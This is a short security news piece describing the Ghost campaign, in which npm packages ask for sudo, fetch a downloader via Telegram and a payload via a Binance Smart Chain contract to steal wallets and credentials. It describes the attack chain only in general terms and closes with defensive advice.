Ghost Campaign Uses 7 Npm Packages to Steal Crypto Wallets and Credentials

The Ghost campaign illustrates how attackers are moving beyond traditional malware distribution channels, targeting the very tools developers rely on daily. By publishing seemingly innocuous npm packages and GitHub repositories, the threat actors embed credential‑stealing logic that activates only after a user unwittingly grants elevated privileges. This approach leverages the trust developers place in open‑source ecosystems, turning routine package installations into a covert infection vector that can compromise development pipelines and production environments alike.

A notable aspect of the operation is its multi‑stage architecture. Initial packages request sudo access under the guise of system optimization, then silently retrieve a downloader from a Telegram channel. The downloader decrypts a payload hosted via a Binance Smart Chain smart contract, enabling rapid updates without altering the core malware. This modular design not only streamlines the attackers’ ability to pivot tactics but also complicates detection, as each stage appears benign until the final remote‑access trojan is executed.

For organizations, the implications are clear: supply‑chain security must extend to every dependency, including seemingly low‑risk utilities. Implementing strict permission controls, monitoring for anomalous npm install logs, and employing runtime security tools can mitigate the risk of credential exfiltration. As AI‑assisted development workflows gain traction, security teams should also scrutinize automated code generation pipelines for hidden malicious scripts, ensuring that the convenience of modern tooling does not become an attack surface.